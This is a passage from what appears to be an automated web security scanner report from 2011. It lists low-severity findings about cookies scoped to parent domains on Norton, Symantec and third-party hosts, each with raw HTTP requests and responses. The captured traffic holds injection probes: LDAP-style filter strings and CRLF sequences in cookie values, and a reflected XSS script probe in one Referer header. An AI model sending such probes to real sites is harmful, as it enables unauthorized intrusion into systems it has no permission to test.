Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.17. http://buy.norton.com/special-promotions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /special-promotions

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /special-promotions HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 401

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

9.18. http://buy.norton.com/support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /support

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://www.norton.com/onlinehelp
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 259

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.norton.com/onlinehelp">
...[SNIP]...

9.19. http://buy.norton.com/upgrades-renewals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /upgrades-renewals

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:18; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:20 GMT
Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=5c55d1c3-a981-4fb5-9327-d629b62b51071315603880402
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:18; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LANGUAGE=EN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/up
...[SNIP]...

9.20. http://buy.symanteccloud.com/freetrial

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.symanteccloud.com
Path:   /freetrial

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /freetrial HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 471

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.21. http://buy.symanteccloud.com/smbstore

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.symanteccloud.com
Path:   /smbstore

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smbstore HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 459

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.22. http://free.pctools.com/res/js/utils.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /res/js/utils.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /res/js/utils.php HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com


9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

9.24. http://sales.liveperson.net/hc/2735064/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

9.25. http://sales.liveperson.net/hc/71097838/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/downloads/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
